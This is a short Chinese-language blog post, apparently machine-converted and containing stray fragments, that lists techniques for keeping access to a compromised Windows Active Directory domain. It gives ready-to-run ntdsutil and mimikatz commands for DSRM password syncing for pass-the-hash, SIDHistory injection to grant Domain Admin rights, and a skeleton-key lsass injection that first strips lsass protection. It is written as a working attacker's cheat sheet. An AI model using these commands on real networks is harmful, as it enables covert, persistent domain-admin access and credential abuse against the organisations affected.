權限維持的幾種方法

DSRM


每次修改都須要重置dsrm密碼,本質上dsrm和administrator是一個帳戶。充值後,administrator的NTLMhash將變成你所掌握的帳號的hash值,能夠進行PtHsass

ntdsutil
set dsrm password
重置 DSRM 管理員密碼:sync from domain account ACCOUNTNAME


證實hash值同樣

dom

sid-history


DomainA中的常規用戶賬戶能夠包含DomainA 的SID,若是DomainA 的SID用於特權賬戶或組,就能夠授予常規用戶賬戶域管理員權限,而不須要成爲域管理員組的成員。debug

PS>Get-AdUser -Properties SIDHistory,memberof
mimikatz#privilege::debug
mimikatz#sid::add /new:[DomainAdmin's SID or NAME] /sam:[CommonUserNAME]

如此便可使得CommonUserNAME具有DomainAdmins的SIDHistory,從而具有了權限,個人實驗環境的確沒有辦法搞定最後一步,說是缺乏權限,繼續研究中ing
3d

skeleton key(萬能鑰匙)


給域內全部帳戶增長一個密碼,統一的,每個域內帳戶均可以按照這個密碼進行認證,其原理是對lsass.exe進行注入,因此重啓後會失效code

#沒有lsass.exe保護的 
mimikatz#privilege::debug
mimikatz#misc::skeleton
#有lsass.exe保護的
"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 新建-DWORD值,名稱爲RunAsPPL,數值爲00000001就能夠保護
"""
mimikatz#!+
mimikatz#!processprotect /process:lsass.exe /remove
mimikatz#misc::skeleton


默認的密碼是mimikatz

blog

相關文章
相關標籤/搜索